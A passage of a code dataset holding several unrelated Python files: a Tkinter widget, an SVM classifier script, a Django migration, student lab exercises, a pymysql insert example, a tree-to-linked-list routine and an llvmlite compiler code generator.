args):\n self.args = args\n self.entry[\"state\"] = \"normal\"\n self.label[\"bg\"] = \"orange\"\n self.enterButton = Button(self.frame,text=\"Enter\",font=self.font,width=7,command=self.enterInput)\n self.enterButton.grid(row=0,column=2)\n\n\n\n def enterInput(self):\n char = self.strVar.get()\n self.args[\"ACC\"] = denHex(ord(char))\n self.args[\"inFlag\"] = False\n self.enterButton.destroy()\n self.entry[\"state\"] = \"disabled\"\n self.label[\"bg\"] = \"white\"\n self.strVar.set(\"\")\n self.execute(self.running)\n\n\n\n def execute(self,f):\n pass\n\n\n\n\n\nif __name__ == \"__main__\":\n root = Tk()\n inBar = InBar(root,0,0)\n","sub_path":"CIE_Assembler/src/inBar.py","file_name":"inBar.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"612522989","text":"from sklearn import svm\r\nfrom sklearn.model_selection import cross_val_score\r\nimport numpy as np\r\n\r\n\r\nd00 = np.genfromtxt('sleeping_features.csv',delimiter=',')\r\nd01 = np.genfromtxt('sitting_features.csv',delimiter=',')\r\nd02 = np.genfromtxt('standing_features.csv',delimiter=',')\r\nd03 = np.genfromtxt('walking_features.csv',delimiter=',')\r\n\r\n\r\nn00 = d00.shape[0]\r\nn01 = d01.shape[0]\r\nn02 = d02.shape[0]\r\nn03 = d03.shape[0]\r\n\r\nprint(n00)\r\nprint(n01)\r\nprint(n02)\r\nprint(n03)\r\n\r\nt00 = np.zeros(n00) + 1\r\nt01 = np.zeros(n01) + 2\r\nt02 = np.zeros(n02) + 3\r\nt03 = np.zeros(n03) + 4\r\n\r\n\r\nd10 = np.vstack((d00,d01))\r\nd10 = np.vstack((d10,d02))\r\nd10 = np.vstack((d10,d03))\r\n\r\nprint(d10)\r\nprint(d10.shape)\r\n\r\nt10 = np.concatenate((t00,t01))\r\nt10 = np.concatenate((t10,t02))\r\nt10 = np.concatenate((t10,t03))\r\n\r\nprint(t10)\r\nprint(t10.shape)\r\n\r\nfrom sklearn.utils import shuffle\r\nd11, t11 = shuffle(d10, t10, random_state=0)\r\n\r\nprint(d11,t11)\r\n\r\nclf = svm.SVC()\r\nprint(clf)\r\nscores = cross_val_score(clf, d11, t11, cv=10)\r\nprint(scores)\r\nprint(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\r\n\r\n\r\ndt01 = np.genfromtxt('sitting_short_features.csv', delimiter=',')\r\ndt02 = np.genfromtxt('standing_short_features.csv', delimiter=',')\r\ndt03 = np.genfromtxt('sleep_short_features.csv', delimiter=',')\r\ndt04 = np.genfromtxt('walking_short_features.csv', delimiter=',')\r\n\r\nclf2 = svm.SVC()\r\nprint(clf2)\r\nclf2.fit(d11,t11)\r\nzz01 = clf2.predict(dt01)\r\nnzz01 = zz01.shape[0]\r\n#print(zz01)\r\nac01 = (zz01 == 2.).sum()\r\nprint(ac01, nzz01)\r\nprint(\"sitting data error: \", ((nzz01-ac01)/nzz01)*100)\r\n\r\nzz02 = clf2.predict(dt02)\r\nnzz02 = zz02.shape[0]\r\n#print(zz02)\r\nac02 = (zz02 == 3.).sum()\r\nprint(ac02, nzz02)\r\nprint(\"standing data error: \", ((nzz02-ac02)/nzz02)*100)\r\n\r\nzz03 = clf2.predict(dt03)\r\nnzz03 = zz03.shape[0]\r\n#print(zz03)\r\nac03 = (zz03 == 1.).sum()\r\nprint(ac03, nzz03)\r\nprint(\"sleeping data error: \", ((nzz03-ac03)/nzz03)*100)\r\n\r\nzz04 = clf2.predict(dt04)\r\nnzz04 = zz04.shape[0]\r\n#print(zz04)\r\nac04 = (zz04 == 4.).sum()\r\nprint(ac04, nzz04)\r\nprint(\"walking data error: \", ((nzz04-ac04)/nzz04)*100)\r\n","sub_path":"Assignment08/Classifier/svm_7_0.py","file_name":"svm_7_0.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227843325","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0014_hero_directo'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='hero',\n name='directo',\n field=models.CharField(max_length=100, verbose_name=b'codigo hangout', blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"blog/migrations/0015_auto_20150531_2123.py","file_name":"0015_auto_20150531_2123.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"374533343","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProgram name: Lab 2\nStudent name: Zeyu Li\nStudent number: 109 934 158\nDate: Sep 17, 2018\nCourse code: PRG469NAAL\n\"\"\"\n# Question #1\nfrom copy import copy \ndef pascalsTriangle(row):\n nums = [1]\n for i in range(int(row)):\n print(*nums)\n nums.append(1)\n temp = copy(nums)\n for d in range(i):\n nums[d + 1] = temp[d] + nums[d + 1]\n \nrow = input(\"Please enter the rows of the Pascal's Triangle: \")\npascalsTriangle(row)\n\n# Question #2\ndef alphaFrequency(string):\n count = 0\n string = string.lower()\n for i in range(26):\n for j in range(len(string)):\n if(string[j] == chr(i+97)):\n count += 1\n while(count != 0):\n print(chr(i+97) + \"=\" + str(count) + \" \" + \"*\"* count)\n count = 0\n \nstring = input(\"Please enter a string: \")\nalphaFrequency(string)\n\n# Question #3\nimport random\ndef ran49():\n numbers = [random.randint(1, 49)]\n while(len(numbers) < 6):\n newNum = random.randint(1, 49)\n if newNum not in numbers:\n numbers.append(newNum)\n numbers = sorted(numbers, key=int)\n print(*numbers)\n \nsets = input(\"Please enter the number of sets you want to generate: \")\nfor i in range(int(sets)):\n ran49()","sub_path":"Labs/Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"24246870","text":"\"\"\"\n数据库写操作\n\"\"\"\nimport pymysql\n# 连接数据库\ndb = pymysql.connect(host='127.0.0.1',\n port=3306,\n user='root',\n password = '123456',\n database = 'stu',\n charset = 'utf8')\n# 生成游标\ncur =db.cursor()\n# 写数据库操作\n# name = input(\"请输入姓名:\")\n# sex = input(\"请输入性别(w/m):\")\n# age = input(\"请输入年龄:\")\n# score = input(\"请输入成绩:\")\n# try:\n# # sql='insert into cls (name,sex,age,score)\n# # values (\"%s\",\"%s\",%s,%s);'%(name,sex,age,score)\n# # 方法2\n# sql = 'insert into cls (name,sex,age,score) values (%s,%s,%s,%s);'\n# cur.execute(sql,[name,sex,age,score]) # 执行sql语句 (不能给sql语句传递关键字,表名,字段名,符号)\n# db.commit() # 将写操作结果提交到数据库\n# except Exception as e:\n# print(e)\n# db.rollback() # 一旦出错则回滚 到 ���句执行之前的状态\nstudent = [\n (\"sfr\",\"w\",16,81),\n (\"sfj\",\"w\",17,80),\n (\"sfl\",\"m\",18,79)\n]\ntry:\n # for i in student:\n # sql = 'insert into cls (name,sex,age,score) values (%s,%s,%s,%s);'\n # cur.execute(sql,i)\n sql = 'insert into cls (name,sex,age,score) values (%s,%s,%s,%s);'\n cur.executemany(sql,student) # 执行sql语句 (不能给sql语句传递关键字,表名,字段名,符号)\n db.commit() # 将写操作结果提交到数据库\nexcept Exception as e:\n print(e)\n db.rollback()\n\n\n# 使用完毕\ncur.close()\ndb.close()","sub_path":"dir/exercise01.py","file_name":"exercise01.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"544798345","text":"prev = None\r\nclass BinaryTree:\r\n def __init__(self,data):\r\n self.data = data\r\n self.left = None\r\n self.right = None\r\n\r\ndef printList(node):\r\n curr = node\r\n while(curr):\r\n print(curr.data)\r\n curr = curr.right\r\n\r\ndef BT2DLL(root):\r\n head = [0]\r\n BT2DLLHelper(root,head)\r\n return head[0]\r\n\r\ndef BT2DLLHelper(root,head):\r\n global prev # making a variable global inside the scope of a function makes the variable static\r\n if root is None:\r\n return\r\n\r\n BT2DLLHelper(root.left,head)\r\n if prev is None:\r\n head[0] = root\r\n\r\n else:\r\n root.left = prev\r\n prev.right = root\r\n prev = root\r\n\r\n BT2DLLHelper(root.right,head)\r\n\r\nroot = BinaryTree(12)\r\nroot.left = BinaryTree(7)\r\nroot.left.left = BinaryTree(2)\r\nroot.left.right = BinaryTree(8)\r\nroot.right = BinaryTree(24)\r\nhead1 = BT2DLL(root)\r\nprintList(head1)\r\n\r\n# printList(head1)\r\n","sub_path":"Trees/BT to Doubly LL.py","file_name":"BT to Doubly LL.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271539881","text":"from llvmlite import ir\nfrom random import randint\nimport llvmlite.binding as llvm\nfrom ctypes import *\nfrom ctypes import CFUNCTYPE, c_double, c_int32\nfrom symbol_table import SymTab\nfrom CompilerError import *\n\n\ntype_t = {\n \"INTEGER\": ir.IntType(32),\n \"REAL\": ir.DoubleType(),\n \"CHAR\": ir.IntType(8),\n \"BOOLEAN\": ir.IntType(1),\n}\n\nir_type_t = {\n \"INTEGER\": ir.IntType(32)(0).type,\n \"REAL\": ir.DoubleType()(0).type,\n \"CHAR\": ir.IntType(8)(0).type,\n \"BOOLEAN\": ir.IntType(1)(0).type,\n}\n\n\nclass Codegen:\n def __init__(self, root, debug=False):\n self.root = root\n self.debug = debug\n self.symbol_table = SymTab()\n self.module = ir.Module(root.children[0].children[1].name)\n self.caselist = []\n self.default = None\n\n def codegen(self):\n self._codegen(self.root)\n llvm_ir = self.module.__repr__()\n llvm.initialize()\n llvm.initialize_native_target()\n llvm.initialize_native_asmprinter()\n self.mod = llvm.parse_assembly(llvm_ir)\n # mod.verify()\n target = llvm.Target.from_default_triple()\n target_machine = target.create_target_machine()\n asm = target_machine.emit_assembly(self.mod)\n return asm\n\n def irshow(self):\n self._codegen(self.root)\n return self.module\n\n\n def crun(self, func, args, ctype=c_int32):\n target = llvm.Target.from_default_triple()\n target_machine = target.create_target_machine()\n # And an execution engine with an empty backing module\n backing_mod = llvm.parse_assembly(\"\")\n engine = llvm.create_mcjit_compiler(backing_mod, target_machine)\n engine.add_module(self.mod)\n engine.finalize_object()\n engine.run_static_constructors()\n func_ptr = engine.get_function_address(func)\n cfunc = CFUNCTYPE(ctype)(func_ptr)\n\n res = cfunc(*args)\n\n return res\n\n def _codegen(self, node):\n method = node.type\n return getattr(self, method)(node)\n\n\n def info(self, node):\n print(\"Debug: Node { %s, %s, %s}\" % (node.type, node.name, node.children))\n\n def program(self, node):\n self.symbol_table.create_tab()\n self.main_type = ir.FunctionType(ir.VoidType(), ())\n self.main_func = ir.Function(self.module, self.main_type, name=node.children[0].children[1].name)\n self.block = self.main_func.append_basic_block('main')\n self.builder = ir.IRBuilder(self.block)\n self._codegen(node.children[1])\n self.builder.ret_void()\n # print(self.module)\n\n def routine(self, node):\n for n in node.children:\n self._codegen(n)\n\n def subroutine(self, node):\n for n in node.children:\n self._codegen(n)\n\n def routine_head(self, node):\n for n in node.children:\n self._codegen(n)\n\n def label_part(self, node):\n pass\n\n def const_part(self, node):\n if len(node.children) < 2:\n return\n else:\n self._codegen(node.children[1])\n\n def const_expr_list(self, node):\n paralist = node.children[-4:]\n name = paralist[0].name\n const_v = self._codegen(paralist[2])\n # addr = self.builder.alloca(const_v.type)\n # self.builder.store(const_v, addr)\n # self.symbol_table.insert([name, addr])\n\n if len(self.symbol_table.tables) > 1:\n addr = self.builder.alloca(const_v.type)\n self.builder.store(const_v, addr)\n else:\n addr = ir.GlobalVariable(self.module, const_v.type, name)\n try:\n if const_v.type.intrinsic_name == 'i32':\n addr.initializer = ir.Constant(ir.IntType(32), int(const_v.constant))\n elif const_v.type.intrinsic_name == 'f64':\n addr.initializer = ir.Constant(ir.DoubleType(), float(const_v.constant))\n elif const_v.type.intrinsic_name == 'i8':\n addr.initializer = ir.Constant(ir.IntType(8), int(const_v.constant))\n except AttributeError:\n addr.initializer = const_v\n addr.global_constant = True\n\n self.symbol_table.insert([name, addr])\n\n if len(node.children) == 5:\n self._codegen(node.children[0])\n\n def const_value(self, node):\n t = node.children[0].type\n value = node.children[0].name\n if t in type_t.keys():\n ir_type = type_t[t]\n if ir_type.intrinsic_name == 'i8':\n value = ord(value[1])\n const_v = ir.Constant(ir_type, value)\n return const_v\n else:\n value = bytes(value.strip('\"'), encoding='utf-8').decode('unicode-escape')\n value += '\\0'\n c_str = ir.Constant(ir.ArrayType(ir.IntType(8), len(value)), bytearray(value.encode(\"utf8\")))\n return c_str\n\n def type_part(self, node):\n self._codegen(node.children[-1])\n\n def var_part(self, node):\n self._codegen(node.children[-1])\n\n def var_decl_list(self, node):\n for n in node.children:\n self._codegen(n)\n\n def type_decl_list(self, node):\n for n in node.children:\n self._codegen(n)\n\n def var_decl(self, node):\n namelist = self.name_list(node.children[0])\n if (node.children[2].children[0].type == \"simple_type_decl\"):\n ir_type = self.type_decl(node.children[2])\n for name in namelist:\n # addr = self.builder.alloca(ir_type)\n # # addr = ir.GlobalVariable(self.module, ir_type, node.children[0].children[0].name)\n # # addr.initializer = ir.Constant(ir.IntType(32), 0)\n # self.symbol_table.insert([name, addr])\n if len(self.symbol_table.tables) > 1:\n addr = self.builder.alloca(ir_type)\n else:\n addr = ir.GlobalVariable(self.module, ir_type, name)\n if ir_type.intrinsic_name == 'i32':\n addr.initializer = ir.Constant(ir.IntType(32), 0)\n elif ir_type.intrinsic_name == 'f64':\n addr.initializer = ir.Constant(ir.DoubleType(), 0)\n elif ir_type.intrinsic_name == 'i8':\n addr.initializer = ir.Constant(ir.IntType(8), 0)\n self.symbol_table.insert([name, addr])\n elif (node.children[2].children[0].type == \"array_type_decl\"):\n array_list = self.type_decl(node.children[2])\n array_type = ir.ArrayType(array_list[1], int(array_list[2]) + 1) # x integers of element\n for name in namelist:\n addr = self.builder.alloca(array_type) # pointer to array\n self.symbol_table.insert([name, addr])\n elif (node.children[2].children[0].type == \"record_type_decl\"):\n field_list = self.type_decl(node.children[2])\n i32 = ir.IntType(32)\n for name in namelist:\n field_body = [i32]\n count = 1\n for f in field_list[1]:\n field_body += [f[1]]\n index = ir.Constant(i32, count)\n try:\n self.symbol_table.insert([name + \".\" + f[0], index], 0)\n except MultiDefinedError as error:\n pass\n count += 1\n str_list = ir.LiteralStructType(field_body)\n addr = self.builder.alloca(str_list) # pointer to array\n self.symbol_table.insert([name, addr])\n\n def type_definition(self, node):\n name = node.children[0].name\n if (node.children[2].children[0].type == \"array_type_decl\"):\n array_list = self.type_decl(node.children[2])\n array_type = ir.ArrayType(array_list[1], int(array_list[2])+1) # x integers of element\n addr = self.builder.alloca(array_type) # pointer to array\n self.symbol_table.insert([name, addr])\n elif (node.children[2].children[0].type == \"record_type_decl\"):\n field_list = self.type_decl(node.children[2])\n i32 = ir.IntType(32)\n field_body = [i32]\n count = 1\n for f in field_list[1]:\n field_body += [f[1]]\n index = ir.Constant(i32, count)\n self.symbol_table.insert([name + \".\" + f[0], index])\n count += 1\n str_list = ir.LiteralStructType(field_body)\n addr = self.builder.alloca(str_list) # pointer to array\n self.symbol_table.insert([name, addr])\n\n\n def name_list(self, node):\n if len(node.children) > 1:\n namelist = self.name_list(node.children[0])\n else:\n namelist = []\n name = [node.children[-1].name]\n return namelist + name\n\n def type_decl(self, node):\n if node.children[0].type == \"simple_type_decl\":\n return self.simple_type_decl(node.children[0])\n elif node.children[0].type == \"array_type_decl\":\n return self.array_type_decl(node.children[0])\n elif node.children[0].type == \"record_type_decl\":\n return self.record_type_decl(node.children[0])\n\n def simple_type_decl(self, node):\n if node.children[0].type == \"SYS_TYPE\":\n spl_type = node.children[0].name.upper()\n ir_type = type_t[spl_type]\n return ir_type\n\n def array_type_decl(self, node):\n if node.children[2].children[0].children[0].name == \"1\":\n spl_type = node.children[5].children[0].children[0].name.upper()\n ir_type = type_t[spl_type]\n return [\"array\", ir_type, node.children[2].children[2].children[0].name]\n else:\n raise SplTypeError([\"Cannot create array\"])\n\n def record_type_decl(self, node):\n return [\"record\", self._codegen(node.children[1])]\n\n def field_decl_list(self, node):\n field_list = []\n for n in node.children:\n field_list +=self._codegen(n)\n return field_list\n\n def field_decl(self, node):\n namelist = self.name_list(node.children[0])\n ir_type = self.type_decl(node.children[2])\n field_list = []\n for name in namelist:\n field_list += [[name, ir_type]]\n return field_list\n\n def routine_part(self, node):\n for n in node.children:\n self._codegen(n)\n\n def procedure_decl(self, node):\n name, paralist = self.procedure_head(node.children[0])\n namelist = []\n ir_type_list = []\n for t in paralist:\n if t[0][0] == \"var\":\n for i in range(1, len(t[0])):\n ir_type_list.append(t[1].as_pointer())\n namelist.append((\"var\", t[0][i]))\n else:\n for i in range(1, len(t[0])):\n ir_type_list.append(t[1])\n namelist.append((\"val\", t[0][i]))\n\n\n func_type = ir.FunctionType(ir.VoidType(), ir_type_list)\n func = ir.Function(self.module, func_type, name=name)\n self.symbol_table.insert([name, func])\n self.symbol_table.create_tab()\n\n stored_builder = self.builder\n block = func.append_basic_block(name=name)\n self.builder = ir.IRBuilder(block)\n\n func_args = func.args\n for i in range(len(func_args)):\n if namelist[i][0] == \"val\":\n addr = self.builder.alloca(ir_type_list[i])\n self.builder.store(func_args[i], addr)\n self.symbol_table.insert([namelist[i][1], addr])\n if namelist[i][0] == \"var\":\n addr = func_args[i]\n self.symbol_table.insert([namelist[i][1], addr])\n\n self.subroutine(node.children[2])\n self.builder.ret_void()\n self.builder = stored_builder\n self.symbol_table.pop()\n\n def procedure_head(self, node):\n name = node.children[1].name\n paralist = self._codegen(node.children[2]) # [(['a'], (ir_type, spl_type))]\n return name, paralist # name(str), paralist([(paraname_list, irtype), ..]), ret(type)\n\n def function_decl(self, node):\n name, paralist, ret = self.function_head(node.children[0])\n namelist = []\n ir_type_list = []\n for t in paralist:\n if t[0][0] == \"var\":\n for i in range(1, len(t[0])):\n ir_type_list.append(t[1].as_pointer())\n namelist.append((\"var\", t[0][i]))\n else:\n for i in range(1, len(t[0])):\n ir_type_list.append(t[1])\n namelist.append((\"val\", t[0][i]))\n\n ret_ir_type = type_t[node.children[0].children[-1].children[0].name.upper()]\n\n func_type = ir.FunctionType(ret_ir_type, ir_type_list)\n func = ir.Function(self.module, func_type, name=name)\n self.symbol_table.insert([name, func])\n self.symbol_table.create_tab()\n\n stored_builder = self.builder\n block = func.append_basic_block(name=name)\n self.builder = ir.IRBuilder(block)\n\n retaddr = self.builder.alloca(ret_ir_type)\n self.symbol_table.insert([name+\"_return\", retaddr])\n\n func_args = func.args\n for i in range(len(func_args)):\n if namelist[i][0] == \"val\":\n addr = self.builder.alloca(ir_type_list[i])\n self.builder.store(func_args[i], addr)\n self.symbol_table.insert([namelist[i][1], addr])\n if namelist[i][0] == \"var\":\n addr = func_args[i]\n self.symbol_table.insert([namelist[i][1], addr])\n\n self.subroutine(node.children[2])\n retval = self.builder.load(retaddr)\n self.builder.ret(retval)\n\n self.builder = stored_builder\n self.symbol_table.pop()\n\n def function_head(self, node):\n name = node.children[1].name\n paralist = self._codegen(node.children[2]) # [(['a'], (ir_type, spl_type))]\n ret = self._codegen(node.children[4])\n return name, paralist, ret # name(str), paralist([(paraname_list, irtype), ..]), ret(type)\n\n def parameters(self, node):\n return self._codegen(node.children[1])\n\n def para_decl_list(self, node):\n if len(node.children) > 1:\n pre_list = self.para_decl_list(node.children[0])\n else:\n pre_list = []\n paralist = pre_list + [self.para_type_list(node.children[-1])]\n return paralist\n\n def para_type_list(self, node): # (paraname_list, ir_type)\n paraname_list = self._codegen(node.children[0]) # val_para_list only [str, ..]\n ir_type = self._codegen(node.children[-1])\n if node.children[0].type == \"var_para_list\":\n paraname_list.insert(0, \"var\")\n else:\n paraname_list.insert(0, \"val\")\n return paraname_list, ir_type\n\n def val_para_list(self, node):\n return self._codegen(node.children[0])\n\n def var_para_list(self, node):\n return self._codegen(node.children[1])\n\n def routine_body(self, node):\n self.compound_stmt(node.children[0])\n\n def compound_stmt(self, node):\n self.stmt_list(node.children[1])\n\n def stmt_list(self, node):\n if len(node.children) > 1:\n self._codegen(node.children[0])\n self._codegen(node.children[1])\n else:\n self.epsilon(node.children[0])\n\n def stmt(self, node):\n self._codegen(node.children[-1])\n\n def non_label_stmt(self, node):\n self._codegen(node.children[0])\n\n def assign_stmt(self, node):\n if node.children[1].type == \"ASSIGN\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n rhs = self.expression(node.children[2])\n\n if type(lhs) == ir.Function:\n # self.builder.ret(rhs)\n lhs = self.symbol_table.find(name+'_return')['entry']\n self.builder.store(rhs, lhs)\n else:\n if str(lhs.type)[:-1] != str(rhs.type):\n raise SplTypeError([\"Cannot assign %s to %s\" % (str(rhs.type), str(lhs.type)[:-1])])\n self.builder.store(rhs, lhs)\n elif node.children[1].type == \"LB\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n rhs = self.expression(node.children[5])\n index = self.expression(node.children[2])\n i32 = ir.IntType(32)\n i32_0 = ir.Constant(i32, 0)\n pointer_to_index = self.builder.gep(lhs, [i32_0, index]) # gets address of array[0]\n if str(pointer_to_index.type)[:-1] != str(rhs.type):\n raise SplTypeError([\"Cannot assign %s to %s\" % (str(rhs.type), str(pointer_to_index.type)[:-1])])\n self.builder.store(rhs, pointer_to_index)\n elif node.children[1].type == \"DOT\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n rhs = self.expression(node.children[4])\n index = node.children[2].name\n offset = self.symbol_table.find(name + \".\" + index)[\"entry\"]\n i32 = ir.IntType(32)\n i32_0 = ir.Constant(i32, 0)\n pointer_to_index = self.builder.gep(lhs, [i32_0, offset]) # gets address of array[0]\n if str(pointer_to_index.type)[:-1] != str(rhs.type):\n raise SplTypeError([\"Cannot assign %s to %s\" % (str(rhs.type), str(pointer_to_index.type)[:-1])])\n self.builder.store(rhs, pointer_to_index)\n\n def proc_stmt(self, node):\n if node.children[0].type == 'READ':\n addr = self.symbol_table.find(node.children[2].children[0].name)['entry']\n python_sca = \"\"\n ran = str(randint(0, 0x7FFFFFFF))\n voidptr_ty = ir.IntType(8).as_pointer()\n scanf = self.module.globals.get('scanf', None)\n if not scanf:\n scanf_ty = ir.FunctionType(ir.IntType(32), [voidptr_ty], var_arg=True)\n scanf = ir.Function(self.module, scanf_ty, name=\"scanf\")\n if addr.type.pointee.intrinsic_name == 'i32':\n python_sca = python_sca + '%d\\0'\n elif addr.type.pointee.intrinsic_name == 'f64':\n python_sca = python_sca + '%f\\0'\n elif addr.type.pointee.intrinsic_name == 'i8':\n python_sca = python_sca + '%c\\0'\n else:\n python_sca = python_sca + '%s\\0'\n fmt_sca = ir.Constant(ir.ArrayType(ir.IntType(8), len(python_sca)), bytearray(python_sca.encode(\"utf8\")))\n global_sca = ir.GlobalVariable(self.module, fmt_sca.type, name='sca'+ran)\n global_sca.linkage = 'internal'\n global_sca.global_constant = True\n global_sca.initializer = fmt_sca\n sca_arg = self.builder.bitcast(global_sca, voidptr_ty)\n self.builder.call(scanf, [sca_arg, addr])\n self.builder.load(addr)\n return\n\n args = self.args_list(node.children[2])\n if node.children[0].name == 'write':\n ran = str(randint(0, 0x7FFFFFFF))\n voidptr_ty = ir.IntType(8).as_pointer()\n printf = self.module.globals.get('printf', None)\n if not printf:\n printf_ty = ir.FunctionType(ir.IntType(32), [voidptr_ty], var_arg=True)\n printf = ir.Function(self.module, printf_ty, name=\"printf\")\n python_str = \"SPL >> \"\n for i in args:\n if i.type.intrinsic_name == 'i32':\n python_str = python_str + \"%d \"\n elif i.type.intrinsic_name == 'f64':\n python_str = python_str + \"%f \"\n else:\n python_str = python_str + \"%s \"\n python_str = python_str + \"\\0\"\n fmt_str = ir.Constant(ir.ArrayType(ir.IntType(8), len(python_str)), bytearray(python_str.encode(\"utf8\")))\n global_fmt = ir.GlobalVariable(self.module, fmt_str.type, name='fmt'+ran)\n global_fmt.linkage = 'internal'\n global_fmt.global_constant = True\n global_fmt.initializer = fmt_str\n fmt_arg = self.builder.bitcast(global_fmt, voidptr_ty)\n self.builder.call(printf, [fmt_arg] + args)\n\n elif node.children[0].name == 'writeln':\n ran = str(randint(0, 0x7FFFFFFF))\n voidptr_ty = ir.IntType(8).as_pointer()\n printf = self.module.globals.get('printf', None)\n if not printf:\n printf_ty = ir.FunctionType(ir.IntType(32), [voidptr_ty], var_arg=True)\n printf = ir.Function(self.module, printf_ty, name=\"printf\")\n python_str = \"SPL >> \"\n for i in args:\n if i.type.intrinsic_name == 'i32':\n python_str = python_str + \"%d \"\n elif i.type.intrinsic_name == 'f64':\n python_str = python_str + \"%f \"\n else:\n python_str = python_str + \"%s \"\n python_str = python_str + \"\\n\\0\"\n fmt_str = ir.Constant(ir.ArrayType(ir.IntType(8), len(python_str)), bytearray(python_str.encode(\"utf8\")))\n global_fmt = ir.GlobalVariable(self.module, fmt_str.type, name='fmt'+ran)\n global_fmt.linkage = 'internal'\n global_fmt.global_constant = True\n global_fmt.initializer = fmt_str\n fmt_arg = self.builder.bitcast(global_fmt, voidptr_ty)\n self.builder.call(printf, [fmt_arg] + args)\n\n\n else:\n args = self.args_list(node.children[2])\n func = self.symbol_table.find(node.children[0].name)[\"entry\"]\n args_type = func.args\n for i in range(len(args_type)):\n if args_type[i].type.is_pointer:\n args[i] = self.find_addr(node.children[2], len(args) - i - 1)\n return self.builder.call(func, args)\n\n def find_addr(self, node, n):\n cur = node\n for i in range(n):\n cur = cur.children[0]\n return self.symbol_table.find(cur.children[-1].children[-1].children[-1].children[-1].children[-1].name)['entry']\n\n def if_stmt(self, node):\n pred = self._codegen(node.children[1])\n with self.builder.if_else(pred) as (then, otherwise):\n with then:\n # stored_builder = self.builder\n # block = self.builder.append_basic_block(\"then_\"+str(ran))\n # self.builder = ir.IRBuilder(block)\n # self.builder.goto_block(then)\n self._codegen(node.children[3])\n # self.builder = stored_builder\n with otherwise:\n # stored_builder = self.builder\n # block = self.builder.append_basic_block(\"else_\" + str(ran))\n # self.builder = ir.IRBuilder(block)\n self._codegen(node.children[4])\n # self.builder = stored_builder\n\n def else_clause(self, node):\n if len(node.children) > 1:\n self._codegen(node.children[-1])\n else:\n return\n\n def repeat_stmt(self, node):\n pass\n\n def case_stmt(self, node):\n ran = str(randint(0, 0x7FFFFFFF))\n expr = self._codegen(node.children[1])\n othercase = self._codegen(node.children[3])\n default = self.builder.append_basic_block('default_'+ran)\n self.default = default\n case_part = self.builder.switch(expr, default)\n for val, block in othercase:\n case_part.add_case(val, block)\n builder = ir.IRBuilder(block)\n builder.position_at_end(block)\n builder.branch(self.default)\n self.builder.position_at_end(default)\n\n def case_expr_list(self, node):\n if len(node.children) > 1:\n return self._codegen(node.children[0]) + [self._codegen(node.children[1])]\n else:\n return [self._codegen(node.children[0])]\n\n def case_expr(self, node):\n ran = str(randint(0, 0x7FFFFFFF))\n val = self._codegen(node.children[0])\n block = self.builder.append_basic_block('case_'+ran)\n stored_builder = self.builder\n self.builder = ir.IRBuilder(block)\n self._codegen(node.children[2])\n self.builder = stored_builder\n return val, block\n\n\n\n def while_stmt(self, node):\n ran = str(randint(0, 0x7FFFFFFF))\n\n whileblock = self.builder.append_basic_block(\"while_\" + ran)\n stmt = self.builder.append_basic_block(\"stmt_\" + ran)\n jumpout = self.builder.append_basic_block(\"jumpout\")\n self.builder.branch(whileblock)\n\n w_builder = ir.IRBuilder(whileblock)\n stored = self.builder\n self.builder = w_builder\n cond = self._codegen(node.children[1])\n self.builder.cbranch(cond, stmt, jumpout)\n s_builder = ir.IRBuilder(stmt)\n self.builder = s_builder\n self._codegen(node.children[3])\n self.builder.branch(whileblock)\n self.builder = stored\n self.builder.position_at_end(jumpout)\n\n def for_stmt(self, node):\n ran = str(randint(0, 0x7FFFFFFF))\n self.symbol_table.create_tab()\n\n addr = self.builder.alloca(ir.IntType(32))\n init_value = self.expression(node.children[3])\n self.symbol_table.insert([node.children[1].name, addr])\n final_value = self.expression(node.children[5])\n self.builder.store(init_value, addr)\n\n forblock = self.builder.append_basic_block(\"for_\" + ran)\n self.builder.branch(forblock)\n f_builder = ir.IRBuilder(forblock)\n\n stmt_block = f_builder.append_basic_block(\"stmt_\" + ran)\n jumpout = f_builder.append_basic_block(\"jumpout_\" + ran)\n\n init_value = f_builder.load(addr)\n direct = node.children[4].children[0].type\n if direct == \"TO\":\n cmp = \">\"\n else:\n cmp = \"<\"\n cond = f_builder.icmp_signed(cmp, init_value, final_value)\n f_builder.cbranch(cond, jumpout, stmt_block)\n stmt_builder = ir.IRBuilder(stmt_block)\n stored_builder = self.builder\n self.builder = stmt_builder\n self._codegen(node.children[-1])\n self.builder = stored_builder\n one = ir.IntType(32)(1)\n if direct == \"TO\":\n inc_dec = stmt_builder.add(init_value, one)\n elif direct == \"DOWNTO\":\n inc_dec = stmt_builder.sub(init_value, one)\n else:\n raise NotDefinedError([direct])\n stmt_builder.store(inc_dec, addr)\n stmt_builder.branch(forblock)\n self.builder.position_at_end(jumpout)\n\n self.symbol_table.pop()\n\n def expression(self, node):\n if len(node.children) > 1:\n lhs = self.expression(node.children[0])\n rhs = self.expr(node.children[-1])\n op = node.children[1].name\n if op == \"<>\":\n op = \"!=\"\n elif op == \"=\":\n op = \"==\"\n else:\n pass\n if lhs.type == rhs.type:\n if lhs.type == ir.IntType(32):\n return self.builder.icmp_signed(op, lhs, rhs)\n elif lhs.type == ir.DoubleType():\n return self.builder.fcmp_ordered(op, lhs, rhs)\n else:\n raise SplTypeError([\"None 